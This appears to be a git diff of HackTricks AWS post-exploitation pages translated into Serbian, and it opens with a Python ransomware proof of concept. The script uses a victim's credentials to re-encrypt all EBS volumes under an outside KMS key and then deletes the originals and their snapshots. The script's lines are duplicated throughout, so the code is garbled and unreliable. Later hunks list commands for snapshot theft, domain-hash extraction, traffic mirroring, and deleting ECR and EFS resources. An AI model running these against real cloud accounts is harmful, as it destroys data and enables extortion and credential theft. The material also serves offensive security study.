This the python script used. It takes AWS creds for a 'victim' account and a publicly available AWS ARN value for the key to be used for encryption. The script will make encrypted copies of ALL available EBS volumes attached to ALL EC2 instances in the targeted AWS account, then stop every EC2 instance, detach the original EBS volumes, delete them, and finally delete all the snapshots utilized during the process. This will leave only encrypted EBS volumes in the targeted 'victim' account. ONLY USE THIS SCRIPT IN A TEST ENVIRONMENT, IT IS DESTRUCTIVE AND WILL DELETE ALL THE ORIGINAL EBS VOLUMES. You can recover them using the utilized KMS key and restore them to their original state via snapshots, but just want to make you aware that this is a ransomware PoC at the end of the day.
Ovo je python skripta koja se koristi. Uzima AWS kredencijale za 'žrtvovani' nalog i javno dostupnu AWS ARN vrednost za ključ koji će se koristiti za enkripciju. Skripta će napraviti enkriptovane kopije SVIH dostupnih EBS volumena priključenih na SVE EC2 instance u ciljanom AWS nalogu, zatim će zaustaviti svaku EC2 instancu, odvojiti originalne EBS volumene, obrisati ih i konačno obrisati sve snimke korišćene tokom procesa. Ovo će ostaviti samo enkriptovane EBS volumene u ciljanom 'žrtvovanom' nalogu. SAMO KORISTITE OVU SKRIPTU U TESTNOM OKRUŽENJU, ONA JE DESTRUKTIVNA I OBRISAĆE SVE ORIGINALNE EBS VOLUMENE. Možete ih povratiti koristeći korišćeni KMS ključ i vratiti ih u prvobitno stanje putem snimaka, ali želim da vas obavestim da je ovo PoC za ransomware na kraju dana.
```
import boto3
import argparse
from botocore.exceptions import ClientError
def enumerate_ec2_instances(ec2_client):
instances = ec2_client.describe_instances()
instance_volumes = {}
for reservation in instances['Reservations']:
for instance in reservation['Instances']:
instance_id = instance['InstanceId']
volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
instance_volumes[instance_id] = volumes
return instance_volumes
instances = ec2_client.describe_instances()
instance_volumes = {}
for reservation in instances['Reservations']:
for instance in reservation['Instances']:
instance_id = instance['InstanceId']
volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
instance_volumes[instance_id] = volumes
return instance_volumes
def snapshot_volumes(ec2_client, volumes):
snapshot_ids = []
for volume_id in volumes:
snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
snapshot_ids.append(snapshot['SnapshotId'])
return snapshot_ids
snapshot_ids = []
for volume_id in volumes:
snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
snapshot_ids.append(snapshot['SnapshotId'])
return snapshot_ids
def wait_for_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])
for snapshot_id in snapshot_ids:
ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])
def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn):
new_volume_ids = []
for snapshot_id in snapshot_ids:
snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
volume_id = snapshot_info['VolumeId']
volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
availability_zone = volume_info['AvailabilityZone']
new_volume_ids = []
for snapshot_id in snapshot_ids:
snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
volume_id = snapshot_info['VolumeId']
volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
availability_zone = volume_info['AvailabilityZone']
volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
Encrypted=True, KmsKeyId=kms_key_arn)
new_volume_ids.append(volume['VolumeId'])
return new_volume_ids
volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
Encrypted=True, KmsKeyId=kms_key_arn)
new_volume_ids.append(volume['VolumeId'])
return new_volume_ids
def stop_instances(ec2_client, instance_ids):
for instance_id in instance_ids:
try:
instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']
for instance_id in instance_ids:
try:
instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']
if instance_state == 'running':
ec2_client.stop_instances(InstanceIds=[instance_id])
print(f"Stopping instance: {instance_id}")
ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
print(f"Instance {instance_id} stopped.")
else:
print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")
if instance_state == 'running':
ec2_client.stop_instances(InstanceIds=[instance_id])
print(f"Stopping instance: {instance_id}")
ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
print(f"Instance {instance_id} stopped.")
else:
print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")
except ClientError as e:
print(f"Error stopping instance {instance_id}: {e}")
except ClientError as e:
print(f"Error stopping instance {instance_id}: {e}")
def detach_and_delete_volumes(ec2_client, volumes):
for volume_id in volumes:
try:
ec2_client.detach_volume(VolumeId=volume_id)
ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
ec2_client.delete_volume(VolumeId=volume_id)
print(f"Deleted volume: {volume_id}")
except ClientError as e:
print(f"Error detaching or deleting volume {volume_id}: {e}")
for volume_id in volumes:
try:
ec2_client.detach_volume(VolumeId=volume_id)
ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
ec2_client.delete_volume(VolumeId=volume_id)
print(f"Deleted volume: {volume_id}")
except ClientError as e:
print(f"Error detaching or deleting volume {volume_id}: {e}")
def delete_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
try:
ec2_client.delete_snapshot(SnapshotId=snapshot_id)
print(f"Deleted snapshot: {snapshot_id}")
except ClientError as e:
print(f"Error deleting snapshot {snapshot_id}: {e}")
for snapshot_id in snapshot_ids:
try:
ec2_client.delete_snapshot(SnapshotId=snapshot_id)
print(f"Deleted snapshot: {snapshot_id}")
except ClientError as e:
print(f"Error deleting snapshot {snapshot_id}: {e}")
def replace_volumes(ec2_client, instance_volumes):
instance_ids = list(instance_volumes.keys())
stop_instances(ec2_client, instance_ids)
instance_ids = list(instance_volumes.keys())
stop_instances(ec2_client, instance_ids)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
detach_and_delete_volumes(ec2_client, all_volumes)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
detach_and_delete_volumes(ec2_client, all_volumes)
def ebs_lock(access_key, secret_key, region, kms_key_arn):
ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)
ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)
instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn) # New encrypted volumes are created but not attached
replace_volumes(ec2_client, instance_volumes) # Stops instances, detaches and deletes old volumes
delete_snapshots(ec2_client, snapshot_ids) # Optionally delete snapshots if no longer needed
instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn) # New encrypted volumes are created but not attached
replace_volumes(ec2_client, instance_volumes) # Stops instances, detaches and deletes old volumes
delete_snapshots(ec2_client, snapshot_ids) # Optionally delete snapshots if no longer needed
def parse_arguments():
parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
parser.add_argument('--region', required=True, help='AWS Region')
parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
return parser.parse_args()
parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
parser.add_argument('--region', required=True, help='AWS Region')
parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
return parser.parse_args()
def main():
args = parse_arguments()
ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)
args = parse_arguments()
ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)
instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
replace_volumes(ec2_client, instance_volumes)
delete_snapshots(ec2_client, snapshot_ids)
instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
replace_volumes(ec2_client, instance_volumes)
delete_snapshots(ec2_client, snapshot_ids)
if __name__ == "__main__":
main()
main()
```
{{#include ../../../../banners/hacktricks-training.md}}

70
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
View File

@@ -2,8 +2,7 @@
{{#include ../../../../banners/hacktricks-training.md}}
## Checking a snapshot locally
## Provera snimka lokalno
```bash
# Install dependencies
pip install 'dsnap[cli]'
@@ -32,10 +31,8 @@ cd dsnap
make docker/build
IMAGE="<download_file>.img" make docker/run #With the snapshot downloaded
```
> [!CAUTION]
> **Note** that `dsnap` will not allow you to download public snapshots. To circumvent this, you can make a copy of the snapshot in your personal account, and download that:
> **Napomena** da `dsnap` neće omogućiti preuzimanje javnih snimaka. Da biste to zaobišli, možete napraviti kopiju snimka u svom ličnom nalogu i preuzeti to:
```bash
# Copy the snapshot
aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57"
@@ -49,59 +46,55 @@ dsnap --region us-east-2 get snap-027da41be451109da
# Delete the snapshot after downloading
aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2
```
Za više informacija o ovoj tehnici proverite originalno istraživanje na [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/)
For more info on this technique check the original research in [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/)
You can do this with Pacu using the module [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots)
## Checking a snapshot in AWS
Možete to uraditi sa Pacu koristeći modul [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots)
## Proveravanje snimka u AWS-u
```bash
aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
```
**Montirajte ga u EC2 VM pod vašom kontrolom** (mora biti u istoj regiji kao kopija rezervne kopije):
**Mount it in a EC2 VM under your control** (it has to be in the same region as the copy of the backup):
Step 1: Nova zapremina vaše željene veličine i tipa treba da se kreira odlaskom na EC2 > Zapremine.
Step 1: A new volume of your preferred size and type is to be created by heading over to EC2 > Volumes.
Da biste mogli da izvršite ovu radnju, pratite ove komande:
To be able to perform this action, follow these commands:
- Kreirajte EBS zapreminu koju ćete priključiti EC2 instanci.
- Osigurajte da su EBS zapremina i instanca u istoj zoni.
- Create an EBS volume to attach to the EC2 instance.
- Ensure that the EBS volume and the instance are in the same zone.
Step 2: Opcija "priključi zapreminu" treba da se izabere desnim klikom na kreiranu zapreminu.
Step 2: The "attach volume" option is to be selected by right-clicking on the created volume.
Step 3: Instanca iz tekstualnog okvira instance treba da se izabere.
Step 3: The instance from the instance text box is to be selected.
Da biste mogli da izvršite ovu radnju, koristite sledeću komandu:
To be able to perform this action, use the following command:
- Priključite EBS zapreminu.
- Attach the EBS volume.
Step 4: Prijavite se na EC2 instancu i nabrojite dostupne diskove koristeći komandu `lsblk`.
Step 4: Login to the EC2 instance and list the available disks using the command `lsblk`.
Step 5: Proverite da li zapremina ima podataka koristeći komandu `sudo file -s /dev/xvdf`.
Step 5: Check if the volume has any data using the command `sudo file -s /dev/xvdf`.
Ako izlaz gornje komande prikazuje "/dev/xvdf: data", to znači da je zapremina prazna.
If the output of the above command shows "/dev/xvdf: data", it means the volume is empty.
Step 6: Formatirajte zapreminu u ext4 datotečni sistem koristeći komandu `sudo mkfs -t ext4 /dev/xvdf`. Alternativno, možete koristiti i xfs format koristeći komandu `sudo mkfs -t xfs /dev/xvdf`. Imajte na umu da treba da koristite ili ext4 ili xfs.
Step 6: Format the volume to the ext4 filesystem using the command `sudo mkfs -t ext4 /dev/xvdf`. Alternatively, you can also use the xfs format by using the command `sudo mkfs -t xfs /dev/xvdf`. Please note that you should use either ext4 or xfs.
Step 7: Kreirajte direktorijum po vašem izboru da montirate novu ext4 zapreminu. Na primer, možete koristiti naziv "newvolume".
Step 7: Create a directory of your choice to mount the new ext4 volume. For example, you can use the name "newvolume".
Da biste mogli da izvršite ovu radnju, koristite komandu `sudo mkdir /newvolume`.
To be able to perform this action, use the command `sudo mkdir /newvolume`.
Step 8: Montirajte zapreminu u direktorijum "newvolume" koristeći komandu `sudo mount /dev/xvdf /newvolume/`.
Step 8: Mount the volume to the "newvolume" directory using the command `sudo mount /dev/xvdf /newvolume/`.
Step 9: Promenite direktorijum u "newvolume" direktorijum i proverite prostor na disku da biste potvrdili montiranje zapremine.
Step 9: Change directory to the "newvolume" directory and check the disk space to validate the volume mount.
Da biste mogli da izvršite ovu radnju, koristite sledeće komande:
To be able to perform this action, use the following commands:
- Promenite direktorijum u `/newvolume`.
- Proverite prostor na disku koristeći komandu `df -h .`. Izlaz ove komande treba da prikazuje slobodan prostor u "newvolume" direktorijumu.
- Change directory to `/newvolume`.
- Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory.
You can do this with Pacu using the module `ebs__explore_snapshots`.
## Checking a snapshot in AWS (using cli)
Možete to uraditi sa Pacu koristeći modul `ebs__explore_snapshots`.
## Proveravanje snimka u AWS (koristeći cli)
```bash
aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id <snap-0b49342abd1bdcb89>
@@ -127,19 +120,14 @@ sudo mount /dev/xvdh1 /mnt
ls /mnt
```
## Shadow Copy
Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project.
Svaki AWS korisnik koji ima **`EC2:CreateSnapshot`** dozvolu može ukrasti hešove svih korisnika domena kreiranjem **snapshot-a Kontrolera domena**, montirajući ga na instancu koju kontroliše i **izvozeći NTDS.dit i SYSTEM** registry hive datoteku za korišćenje sa Impacketovim secretsdump projektom.
You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot.
Možete koristiti ovaj alat za automatizaciju napada: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) ili možete koristiti neku od prethodnih tehnika nakon kreiranja snapshot-a.
## References
- [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/)
{{#include ../../../../banners/hacktricks-training.md}}

12
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
View File

@@ -4,16 +4,12 @@
**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!**
Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**.
Pasivna inspekcija mreže u cloud okruženju je bila **izazovna**, zahtevajući velike promene u konfiguraciji za praćenje mrežnog saobraćaja. Međutim, nova funkcija pod nazivom “**VPC Traffic Mirroring**” je uvedena od strane AWS-a kako bi se pojednostavio ovaj proces. Sa VPC Traffic Mirroring, mrežni saobraćaj unutar VPC-a može biti **dupliran** bez instaliranja bilo kakvog softvera na samim instancama. Ovaj duplirani saobraćaj može biti poslat na sistem za detekciju mrežnih upada (IDS) radi **analize**.
To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts.
Da bismo odgovorili na potrebu za **automatskom implementacijom** potrebne infrastrukture za mirroring i eksfiltraciju VPC saobraćaja, razvili smo skriptu za dokazivanje koncepta pod nazivom “**malmirror**”. Ova skripta se može koristiti sa **kompromitovanim AWS kredencijalima** za postavljanje mirroring-a za sve podržane EC2 instance u ciljanom VPC-u. Važno je napomenuti da VPC Traffic Mirroring podržavaju samo EC2 instance pokretane AWS Nitro sistemom, a VPC cilj za mirroring mora biti unutar istog VPC-a kao i hostovi koji se mirroring-uju.
The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible.
**Uticaj** zlonamernog VPC saobraćaja može biti značajan, jer omogućava napadačima pristup **osetljivim informacijama** koje se prenose unutar VPC-a. **Verovatnoća** takvog zlonamernog mirroring-a je visoka, s obzirom na prisustvo **saobraćaja u čistom tekstu** koji prolazi kroz VPC-e. Mnoge kompanije koriste protokole u čistom tekstu unutar svojih internih mreža iz **razloga performansi**, pretpostavljajući da tradicionalni napadi tipa man-in-the-middle nisu mogući.
For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes.
Za više informacija i pristup [**malmirror skripti**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), može se pronaći u našoj **GitHub repozitoriji**. Skripta automatizuje i pojednostavljuje proces, čineći ga **brzim, jednostavnim i ponovljivim** za ofanzivne istraživačke svrhe.
{{#include ../../../../banners/hacktricks-training.md}}

54
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md
View File

@@ -4,14 +4,13 @@
## ECR
For more information check
Za više informacija proverite
{{#ref}}
../aws-services/aws-ecr-enum.md
{{#endref}}
### Login, Pull & Push
### Prijava, Preuzimanje & Postavljanje
```bash
# Docker login into ecr
## For public repo (always use us-east-1)
@@ -38,17 +37,16 @@ docker push <account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest
# Downloading without Docker
# List digests
aws ecr batch-get-image --repository-name level2 \
--registry-id 653711331788 \
--image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'
--registry-id 653711331788 \
--image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'
## Download a digest
aws ecr get-download-url-for-layer \
--repository-name level2 \
--registry-id 653711331788 \
--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
--repository-name level2 \
--registry-id 653711331788 \
--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
```
After downloading the images you should **check them for sensitive info**:
После преузимања слика требало би да **проверите да ли садрже осетљиве информације**:
{{#ref}}
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics
@@ -56,25 +54,24 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-m
### `ecr:PutLifecyclePolicy` | `ecr:DeleteRepository` | `ecr-public:DeleteRepository` | `ecr:BatchDeleteImage` | `ecr-public:BatchDeleteImage`
An attacker with any of these permissions can **create or modify a lifecycle policy to delete all images in the repository** and then **delete the entire ECR repository**. This would result in the loss of all container images stored in the repository.
Нападач са било којом од ових дозвола може **креирати или модификовати политику животног циклуса да обрише све слике у репозиторијуму** и затим **обрисати цео ECR репозиторијум**. То би резултирало губитком свих контејнерских слика које су похрањене у репозиторијуму.
```bash
bashCopy code# Create a JSON file with the malicious lifecycle policy
echo '{
"rules": [
{
"rulePriority": 1,
"description": "Delete all images",
"selection": {
"tagStatus": "any",
"countType": "imageCountMoreThan",
"countNumber": 0
},
"action": {
"type": "expire"
}
}
]
"rules": [
{
"rulePriority": 1,
"description": "Delete all images",
"selection": {
"tagStatus": "any",
"countType": "imageCountMoreThan",
"countNumber": 0
},
"action": {
"type": "expire"
}
}
]
}' > malicious_policy.json
# Apply the malicious lifecycle policy to the ECR repository
@@ -92,9 +89,4 @@ aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imag
# Delete multiple images from the ECR public repository
aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0
```
{{#include ../../../banners/hacktricks-training.md}}

36
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## ECS
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-ecs-enum.md
@@ -12,42 +12,37 @@ For more information check:
### Host IAM Roles
In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\
Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check:
U ECS, **IAM uloga može biti dodeljena zadatku** koji se izvršava unutar kontejnera. **Ako** se zadatak izvršava unutar **EC2** instance, **EC2 instanca** će imati **drugu IAM** ulogu prikačenu na nju.\
Što znači da ako uspete da **kompromitujete** ECS instancu, potencijalno možete **dobiti IAM ulogu povezanu sa ECR-om i sa EC2 instancom**. Za više informacija o tome kako da dobijete te kredencijale, pogledajte:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
{{#endref}}
> [!CAUTION]
> Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance.
> Imajte na umu da ako EC2 instanca primenjuje IMDSv2, [**prema dokumentaciji**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), **odgovor PUT zahteva** će imati **hop limit od 1**, što onemogućava pristup EC2 metapodacima iz kontejnera unutar EC2 instance.
### Privesc to node to steal other containers creds & secrets
But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached.
Ali pored toga, EC2 koristi docker za pokretanje ECs zadataka, tako da ako možete da pobegnete na čvor ili **pristupite docker socket-u**, možete **proveriti** koji se **drugi kontejneri** pokreću, i čak **ući u njih** i **ukrasti njihove IAM uloge**.
#### Making containers run in current host
Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container.
Pored toga, **EC2 instanca uloga** obično će imati dovoljno **dozvola** da **ažurira stanje kontejner instance** EC2 instanci koje se koriste kao čvorovi unutar klastera. Napadač bi mogao da izmeni **stanje instance na DRAINING**, tada će ECS **ukloniti sve zadatke sa nje** i oni koji se izvršavaju kao **REPLICA** će biti **pokrenuti na drugoj instanci,** potencijalno unutar **napadačeve instance** tako da može **ukrasti njihove IAM uloge** i potencijalno osetljive informacije iz kontejnera.
```bash
aws ecs update-container-instances-state \
--cluster <cluster> --status DRAINING --container-instances <container-instance-id>
--cluster <cluster> --status DRAINING --container-instances <container-instance-id>
```
The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:**
Ista tehnika se može primeniti **odjavljivanjem EC2 instance iz klastera**. Ovo je potencijalno manje prikriveno, ali će **prisiliti zadatke da se izvršavaju na drugim instancama:**
```bash
aws ecs deregister-container-instance \
--cluster <cluster> --container-instance <container-instance-id> --force
--cluster <cluster> --container-instance <container-instance-id> --force
```
A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this:
Zadnja tehnika za prisiljavanje ponovnog izvršavanja zadataka je da se ECS-u naznači da je **zadatak ili kontejner zaustavljen**. Postoje 3 potencijalne API-ja za to:
```bash
# Needs: ecs:SubmitTaskStateChange
aws ecs submit-task-state-change --cluster <value> \
--status STOPPED --reason "anything" --containers [...]
--status STOPPED --reason "anything" --containers [...]
# Needs: ecs:SubmitContainerStateChange
aws ecs submit-container-state-change ...
@@ -55,13 +50,8 @@ aws ecs submit-container-state-change ...
# Needs: ecs:SubmitAttachmentStateChanges
aws ecs submit-attachment-state-changes ...
```
### Uk stealing osetljivih informacija iz ECR kontejnera
### Steal sensitive info from ECR containers
The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them).
EC2 instanca će verovatno imati dozvolu `ecr:GetAuthorizationToken` koja joj omogućava da **preuzme slike** (možete tražiti osetljive informacije u njima).
{{#include ../../../banners/hacktricks-training.md}}

32
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## EFS
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-efs-enum.md
@@ -12,47 +12,35 @@ For more information check:
### `elasticfilesystem:DeleteMountTarget`
An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target.
Napadač bi mogao da obriše mount target, potencijalno ometajući pristup EFS fajl sistemu za aplikacije i korisnike koji se oslanjaju na taj mount target.
```sql
aws efs delete-mount-target --mount-target-id <value>
```
**Potential Impact**: Disruption of file system access and potential data loss for users or applications.
**Potencijalni uticaj**: Poremećaj pristupa sistemu datoteka i potencijalni gubitak podataka za korisnike ili aplikacije.
### `elasticfilesystem:DeleteFileSystem`
An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system.
Napadač bi mogao da obriše čitav EFS sistem datoteka, što bi moglo dovesti do gubitka podataka i uticati na aplikacije koje se oslanjaju na sistem datoteka.
```perl
aws efs delete-file-system --file-system-id <value>
```
**Potential Impact**: Data loss and service disruption for applications using the deleted file system.
**Potencijalni uticaj**: Gubitak podataka i prekid usluge za aplikacije koje koriste obrisani fajl sistem.
### `elasticfilesystem:UpdateFileSystem`
An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion.
Napadač bi mogao da ažurira svojstva EFS fajl sistema, kao što su način propusnosti, kako bi uticao na njegovu performansu ili izazvao iscrpljivanje resursa.
```sql
aws efs update-file-system --file-system-id <value> --provisioned-throughput-in-mibps <value>
```
**Potencijalni uticaj**: Degradacija performansi fajl sistema ili iscrpljivanje resursa.
**Potential Impact**: Degradation of file system performance or resource exhaustion.
### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint`
An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system.
### `elasticfilesystem:CreateAccessPoint` i `elasticfilesystem:DeleteAccessPoint`
Napadač bi mogao da kreira ili obriše pristupne tačke, menjajući kontrolu pristupa i potencijalno sebi dodeljujući neovlašćen pristup fajl sistemu.
```arduino
aws efs create-access-point --file-system-id <value> --posix-user <value> --root-directory <value>
aws efs delete-access-point --access-point-id <value>
```
**Potential Impact**: Unauthorized access to the file system, data exposure or modification.
**Potencijalni uticaj**: Neovlašćen pristup fajl sistemu, izlaganje ili modifikacija podataka.
{{#include ../../../banners/hacktricks-training.md}}

132
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## EKS
For mor information check
Za više informacija proverite
{{#ref}}
../aws-services/aws-eks-enum.md
@@ -12,102 +12,93 @@ For mor information check
### Enumerate the cluster from the AWS Console
If you have the permission **`eks:AccessKubernetesApi`** you can **view Kubernetes objects** via AWS EKS console ([Learn more](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html)).
Ako imate dozvolu **`eks:AccessKubernetesApi`** možete **videti Kubernetes objekte** putem AWS EKS konzole ([Saznajte više](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html)).
### Connect to AWS Kubernetes Cluster
- Easy way:
- Lako rešenje:
```bash
# Generate kubeconfig
aws eks update-kubeconfig --name aws-eks-dev
```
